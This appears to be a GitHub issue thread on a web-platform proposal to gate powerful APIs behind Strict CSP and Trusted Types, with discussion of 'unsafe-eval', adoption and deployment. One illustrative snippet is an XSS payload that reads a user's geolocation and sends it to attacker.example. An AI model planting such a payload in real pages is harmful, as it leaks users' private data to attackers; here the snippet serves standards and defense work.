mikewest opened 1 month ago
cc @domenic, @johnwilander, @camillelamy, and @lweichselbaum who participated in the conversation at TPAC for additional feedback, along with @rbyers and @bvandersloot-mozilla who seemed at least conceptually interested in this kind of thing for digital credentials (if worried about deployment cost).
I should also have mentioned that we're experimenting with this in Chromium for a single API with some weird Origin Trial constraints. It seems fairly straightforwardly implementable, and the constraints seem robust enough given our current experience with both CSP and Trusted Types.
FYI, the current implementation seems to prohibit `'unsafe-eval'`. While this might be okay when applying the `InjectionMitigated` restriction to new APIs, it might make it difficult for old sites to adapt to `InjectionMitigated` when the restriction is applied to existing APIs.

One way to solve this is to check whether Trusted Types is enforced and `createScript` is "strictly" validated (whatever that means). In that case, we could allow `'unsafe-eval'`, since the script passed to `eval` is validated by Trusted Types.
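To make the compatibility concern concrete, here's a minimal sketch (the template string below is purely illustrative): legacy code that builds code from strings breaks outright once `'unsafe-eval'` is dropped, which is what the current rules would require.

```js
// Legacy code paths that assemble code from strings are common on older sites.
// Under a policy without 'unsafe-eval' (e.g. `script-src 'nonce-...' 'strict-dynamic'`),
// both eval() and the Function constructor throw an EvalError, so this path
// breaks even if the site has otherwise deployed a Strict CSP.
const templateSource = 'return "Hello, " + name + "!";';
const render = new Function('name', templateSource); // throws EvalError when 'unsafe-eval' is absent
console.log(render('world'));
```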
I'd love to see a public UseCounter tracking the fraction of Chrome page loads and top sites (via HTTP Archive crawls) which meet these criteria. We should totally be doing what we can to encourage that to grow. As with [SecureContext], once adoption gets large enough to justify it as a credible best practice, I would also support moving powerful APIs behind [InjectionMitigated]. I'm just skeptical that we're really anywhere near that today. E.g., for Digital Credentials, I'd worry that we'd mostly just drive people to the less secure approach of using custom schemes.
A likely good early partner might be Shopify; this seems related to (but even harder than?) their efforts for PCIv4 compliance. @yoavweiss
My main concern here is that we did a good amount of work to add [CrossOriginIsolated], and it got used in one Chromium-only-so-far API. I wish we had instead asked that single API to add the appropriate "If" statement into its algorithm, and only added a Web IDL extended attribute after seeing adoption across several APIs.
On the other hand, at TPAC we discussed how meeting the [InjectionMitigated] bar might be easier than [CrossOriginIsolated], since it doesn't require updating all your third parties recursively. So maybe it will end up seeing more use. I think @RByers's suggestion is a good way to start investigating that question, since it will inform how many feature authors are interested in adopting this requirement for their APIs.
Thanks for your feedback!
@shhnjk: I think this is what the proposal in https://github.com/w3c/webappsec-csp/pull/665 would address? If we landed that, we'd change the rules here accordingly.
@domenic: I agree with you that the bar for injection mitigation is lower than the unfortunately very difficult deployment story for cross-origin isolation in the status quo. As @RByers notes, collecting metrics is certainly a reasonable approach. Even looking only at the `MainFrame` variant of our use counter metrics (which I don't think we publish?), the numbers are still quite respectable in aggregate: ~13% of top-level pages use a Strict CSP, and ~6% enforce Trusted Types. These show a pretty reasonable adoption rate and/or prove theoretical deployability for these kinds of protections IMO, but the question of breadth is a real one: I'll dig through HTTP Archive a bit to get more numbers.
> @shhnjk: I think this is what the proposal in w3c/webappsec-csp#665 would address? If we landed that, we'd change the rules here accordingly.
Oh nice! Yup, that would work, though it only means that a `createScript` callback exists, not that it actually validates anything (i.e. it could just be `createScript: s => s`). But I don't have a good answer for what "validation" here means from a browser's point of view, so I think this is a good start for a V1 proposal.
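For illustration, here's a do-nothing policy that would satisfy a bare "a `createScript` callback exists" check (the policy name is arbitrary):

```js
// With `Content-Security-Policy: require-trusted-types-for 'script'` enforced,
// eval() only accepts TrustedScript values, but nothing stops a site from
// registering a pass-through policy that launders any string into one.
const passthrough = trustedTypes.createPolicy('passthrough', {
  createScript: s => s, // "validates" nothing; returns its input unchanged
});

// Assuming the CSP otherwise permits eval (e.g. per the 'unsafe-eval' carve-out
// discussed above), this still executes arbitrary attacker-controlled code:
eval(passthrough.createScript('console.log("still arbitrary code")'));
```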
@domenic: I think a difference with [CrossOriginIsolated] is that conceptually only two APIs fall into the particular threat model it addresses (process-wide XS-Leaks). On the other hand, it would actually make sense to request [InjectionMitigated] for any new API gated behind a permission prompt, since the permission model is relying on XSS not happening on the page that requests it. Of course, whether this is actually doable from a compatibility perspective is a different question :). But at the very least, it means that there should be a lot more APIs for which we can consider requiring [InjectionMitigated] than APIs that require [CrossOriginIsolated].
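As a concrete illustration of that threat model (geolocation stands in here for any prompt-gated API; the payload and attacker URL are hypothetical):

```js
// Once the user has granted a permission to the site, injected markup can
// exercise the granted capability without triggering any further prompt.
const untrustedInput = `<img src=x onerror="navigator.geolocation.getCurrentPosition(
    p => fetch('https://attacker.example/?lat=' + p.coords.latitude))">`;

document.body.innerHTML = untrustedInput; // a typical XSS sink

// A Strict CSP blocks the inline onerror handler (no 'unsafe-inline'), and
// enforced Trusted Types rejects the plain-string innerHTML assignment;
// that's what makes [InjectionMitigated] a meaningful bar for such APIs.
```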
What problem are you trying to solve?
It would be ideal to limit particularly interesting APIs to contexts in which the user agent can assume a heightened level of certainty that the code accessing the API is in fact the site's code, and not code that an attacker has cleverly found a way to inject into the page.
Over the last ~decade, we've landed on a combination of [Strict CSP](https://web.dev/articles/strict-csp) and Trusted Types as sufficient mitigation. Perhaps we could choose to expose certain APIs only in contexts using those protections. This approach would be conceptually similar to the existing `[SecureContext]` and `[CrossOriginIsolated]` extended attributes.
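As a rough sketch of the deployment this implies (a minimal Node server; the exact qualifying policy is my assumption based on the explainer, not a normative definition):

```js
// Serve a page with a Strict CSP (nonce-based, 'strict-dynamic') plus enforced
// Trusted Types: roughly the headers a response would need for its context to
// count as "injection mitigated".
const http = require('http');
const crypto = require('crypto');

http.createServer((req, res) => {
  const nonce = crypto.randomBytes(16).toString('base64');
  res.setHeader('Content-Security-Policy',
    `script-src 'nonce-${nonce}' 'strict-dynamic'; object-src 'none'; base-uri 'none'; ` +
    `require-trusted-types-for 'script'`);
  res.setHeader('Content-Type', 'text/html');
  res.end(`<!doctype html><script nonce="${nonce}">/* page code */</script>`);
}).listen(8080);
```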
What solutions exist today?
Developers could choose to use Permissions Policy to deny themselves access to certain capabilities if they're not sending appropriate injection-mitigation headers down to the client. This is a reasonable opt-out solution, but it seems unreasonable to expect every developer to make that effort/reward tradeoff on their own.
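For example (a sketch only; geolocation stands in for whichever powerful capability a site wants to deny itself):

```js
// A site that isn't sending injection-mitigation headers can opt out of a
// powerful capability today by denying it to everyone, itself included.
const http = require('http');

http.createServer((req, res) => {
  // This response carries no Strict CSP / Trusted Types enforcement...
  res.setHeader('Permissions-Policy', 'geolocation=()'); // ...so deny the capability outright
  res.setHeader('Content-Type', 'text/html');
  res.end('<!doctype html><title>opt-out demo</title>');
}).listen(8081);
```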
How would you solve it?
https://mikewest.github.io/injection-mitigated/ sketches the approach with a few monkey-patches to CSP, HTML, and WebIDL.
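From a page's perspective, the net effect would presumably be conditional exposure, along the lines of the sketch below (`SomeGatedAPI` is a hypothetical interface name):

```js
// Under the explainer's WebIDL monkey-patch, a gated interface simply isn't
// exposed unless the environment's policies qualify as injection-mitigated.
if ('SomeGatedAPI' in window) {
  // The response shipped a Strict CSP and enforced Trusted Types:
  // the gated capability is available here.
} else {
  // Prerequisites not met: fall back, or surface a deployment error.
  console.warn('SomeGatedAPI unavailable; check CSP / Trusted Types headers.');
}
```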
Anything else?
https://github.com/WICG/digital-credentials/issues/133 is an example of the kind of API I'm thinking about. We also discussed this briefly in WebAppSec's meetings at TPAC last month: https://github.com/w3c/webappsec/blob/main/meetings/2024/2024-09-23-TPAC-Minutes.md#injectionmitigated.